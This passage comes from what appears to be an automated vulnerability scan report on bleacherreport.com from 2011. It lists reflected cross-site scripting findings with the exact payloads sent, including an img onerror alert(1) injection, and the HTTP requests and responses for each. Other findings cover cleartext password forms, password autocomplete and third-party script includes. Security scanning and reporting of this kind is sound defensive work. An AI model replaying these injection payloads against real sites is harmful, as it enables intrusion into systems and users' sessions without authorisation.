GET /pages/privacy3fff4'%3bb174f357c5f HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 53
Date: Tue, 15 Feb 2011 15:57:35 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28350
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
        COMSCORE.beacon({
        c1: 2,
        c2: 6246855,
        c3: '',
        c4: 'http://bleacherreport.com/pages/privacy3fff4';b174f357c5f',
        c5: '',
        c6: '',
        c15: ''
        });
       </script>
...[SNIP]...

2.14. http://bleacherreport.com/pages/privacy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/privacy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92b81"%3b997603b5a97 was submitted in the REST URL parameter 2. This input was echoed as 92b81";997603b5a97 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/privacy92b81"%3b997603b5a97 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 57
Date: Tue, 15 Feb 2011 15:57:34 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 27074
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
   BR.analyticsLoggedIn = false;
   BR.analyticsPageType = "other";
       BR.partnerDomain = "";
   BR.teamTrackerPath = "";

        BR.teamTrackerPath = "/pages/privacy92b81";997603b5a97";        
   BR.teamTrackerPath += "?pagetype=" + BR.analyticsPageType + "&logged_in=" + BR.analyticsLoggedIn;
   
   if(BR.partnerDomain) { BR.teamTrackerPath += "&external_domain=" + BR.partnerDomain;
...[SNIP]...

2.15. http://bleacherreport.com/pages/privacy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/privacy

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ed5"><img%20src%3da%20onerror%3dalert(1)>78f8db4d5e1 was submitted in the REST URL parameter 2. This input was echoed as 82ed5"><img src=a onerror=alert(1)>78f8db4d5e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pages/privacy82ed5"><img%20src%3da%20onerror%3dalert(1)>78f8db4d5e1 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 30
Date: Tue, 15 Feb 2011 15:57:34 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28434
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=6246855&amp;c3=&amp;c4=bleacherreport.com/pages/privacy82ed5"><img src=a onerror=alert(1)>78f8db4d5e1&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1" width="0" height="0" alt="">
...[SNIP]...

2.16. http://bleacherreport.com/pages/rewards [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/rewards

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70a4e'%3bc40474abcc0 was submitted in the REST URL parameter 2. This input was echoed as 70a4e';c40474abcc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/rewards70a4e'%3bc40474abcc0 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 36
Date: Tue, 15 Feb 2011 15:57:50 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28350
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
        COMSCORE.beacon({
        c1: 2,
        c2: 6246855,
        c3: '',
        c4: 'http://bleacherreport.com/pages/rewards70a4e';c40474abcc0',
        c5: '',
        c6: '',
        c15: ''
        });
       </script>
...[SNIP]...

2.17. http://bleacherreport.com/pages/rewards [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/rewards

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 468d9"><img%20src%3da%20onerror%3dalert(1)>a996c4240bd was submitted in the REST URL parameter 2. This input was echoed as 468d9"><img src=a onerror=alert(1)>a996c4240bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pages/rewards468d9"><img%20src%3da%20onerror%3dalert(1)>a996c4240bd HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 33
Date: Tue, 15 Feb 2011 15:57:49 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28434
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=6246855&amp;c3=&amp;c4=bleacherreport.com/pages/rewards468d9"><img src=a onerror=alert(1)>a996c4240bd&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1" width="0" height="0" alt="">
...[SNIP]...

2.18. http://bleacherreport.com/pages/rewards [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/rewards

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4afb5"%3ba737f8ed6f6 was submitted in the REST URL parameter 2. This input was echoed as 4afb5";a737f8ed6f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/rewards4afb5"%3ba737f8ed6f6 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 43
Date: Tue, 15 Feb 2011 15:57:49 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28350
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
   BR.analyticsLoggedIn = false;
   BR.analyticsPageType = "other";
       BR.partnerDomain = "";
   BR.teamTrackerPath = "";

        BR.teamTrackerPath = "/pages/rewards4afb5";a737f8ed6f6";        
   BR.teamTrackerPath += "?pagetype=" + BR.analyticsPageType + "&logged_in=" + BR.analyticsLoggedIn;
   
   if(BR.partnerDomain) { BR.teamTrackerPath += "&external_domain=" + BR.partnerDomain;
...[SNIP]...

2.19. http://bleacherreport.com/pages/terms [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/terms

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a58f8'%3b4d29a69ab7d was submitted in the REST URL parameter 2. This input was echoed as a58f8';4d29a69ab7d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/termsa58f8'%3b4d29a69ab7d HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 38
Date: Tue, 15 Feb 2011 15:58:04 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28344
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
        COMSCORE.beacon({
        c1: 2,
        c2: 6246855,
        c3: '',
        c4: 'http://bleacherreport.com/pages/termsa58f8';4d29a69ab7d',
        c5: '',
        c6: '',
        c15: ''
        });
       </script>
...[SNIP]...

2.20. http://bleacherreport.com/pages/terms [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/terms

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1741f"><img%20src%3da%20onerror%3dalert(1)>5d0e120d6b0 was submitted in the REST URL parameter 2. This input was echoed as 1741f"><img src=a onerror=alert(1)>5d0e120d6b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pages/terms1741f"><img%20src%3da%20onerror%3dalert(1)>5d0e120d6b0 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 46
Date: Tue, 15 Feb 2011 15:58:03 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28428
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=6246855&amp;c3=&amp;c4=bleacherreport.com/pages/terms1741f"><img src=a onerror=alert(1)>5d0e120d6b0&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1" width="0" height="0" alt="">
...[SNIP]...

2.21. http://bleacherreport.com/pages/terms [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/terms

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6af25"%3b1ac0effe710 was submitted in the REST URL parameter 2. This input was echoed as 6af25";1ac0effe710 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/terms6af25"%3b1ac0effe710 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 44
Date: Tue, 15 Feb 2011 15:58:03 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28344
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
   BR.analyticsLoggedIn = false;
   BR.analyticsPageType = "other";
       BR.partnerDomain = "";
   BR.teamTrackerPath = "";

        BR.teamTrackerPath = "/pages/terms6af25";1ac0effe710";        
   BR.teamTrackerPath += "?pagetype=" + BR.analyticsPageType + "&logged_in=" + BR.analyticsLoggedIn;
   
   if(BR.partnerDomain) { BR.teamTrackerPath += "&external_domain=" + BR.partnerDomain;
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://bleacherreport.com/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 37
ETag: "c62154808daf74af6addfeb9c63aca8e"
Date: Tue, 15 Feb 2011 15:54:15 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 29374
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<div id="login-fields">
                   <form action="/login" method="post">
                   <input id="from" name="from" type="hidden" />
...[SNIP]...
</label>
                       <input class="text medium-text" id="user_password" name="user[password]" size="30" type="password" />
                   </fieldset>
...[SNIP]...

3.2. http://bleacherreport.com/signup  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /signup

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /signup HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 48
ETag: "07351e796f62c2c33cc9bd4150d13dd0"
Date: Tue, 15 Feb 2011 15:54:15 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 31151
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<div id="register-to-comment">
               
               <form action="/accounts" method="post" onsubmit="if(!document.getElementById('certify').checked){alert('You have not agreed to the terms of service.');return false}">
               <input id="registration_page_id" name="registration_page_id" type="hidden" value="1" />
...[SNIP]...
</span>
                   <input class="js-tooltip text medium-text" id="user_password" name="user[password]" size="25" tabindex="4" type="password" />
               </div>
...[SNIP]...
</label>
                   <input class="js-tooltip text medium-text" id="user_password_confirmation" name="user[password_confirmation]" size="25" tabindex="5" type="password" />
                   <input type="text" name="comment" id="br-regular-sign-up-comment" />
...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. http://bleacherreport.com/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 37
ETag: "c62154808daf74af6addfeb9c63aca8e"
Date: Tue, 15 Feb 2011 15:54:15 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 29374
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<div id="login-fields">
                   <form action="/login" method="post">
                   <input id="from" name="from" type="hidden" />
...[SNIP]...
</label>
                       <input class="text medium-text" id="user_password" name="user[password]" size="30" type="password" />
                   </fieldset>
...[SNIP]...

4.2. http://bleacherreport.com/signup  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /signup

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /signup HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 48
ETag: "07351e796f62c2c33cc9bd4150d13dd0"
Date: Tue, 15 Feb 2011 15:54:15 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 31151
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<div id="register-to-comment">
               
               <form action="/accounts" method="post" onsubmit="if(!document.getElementById('certify').checked){alert('You have not agreed to the terms of service.');return false}">
               <input id="registration_page_id" name="registration_page_id" type="hidden" value="1" />
...[SNIP]...
</span>
                   <input class="js-tooltip text medium-text" id="user_password" name="user[password]" size="25" tabindex="4" type="password" />
               </div>
...[SNIP]...
</label>
                   <input class="js-tooltip text medium-text" id="user_password_confirmation" name="user[password_confirmation]" size="25" tabindex="5" type="password" />
                   <input type="text" name="comment" id="br-regular-sign-up-comment" />
...[SNIP]...

5. Cross-domain script include  previous  next
There are 88 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://bleacherreport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: bleacherreport.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 42
ETag: "0d5ea19d693b6c6cffc1f30c90c26575"
Cache-Control: private, max-age=0, must-revalidate
Date: Tue, 15 Feb 2011 15:48:31 GMT
Set-Cookie: partner_id=; domain=bleacherreport.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _session_id=9f555693977111dd6913f0157f19a0d8; path=/; HttpOnly
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 76226

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.2. http://bleacherreport.com/2011-nfl-draft  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /2011-nfl-draft

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011-nfl-draft HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 596
ETag: "e9adc5811df535e0c803caf06a3bd0aa"
Date: Tue, 15 Feb 2011 15:55:20 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 61259
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.3. http://bleacherreport.com/2011-nfl-mock-draft  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /2011-nfl-mock-draft

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011-nfl-mock-draft HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
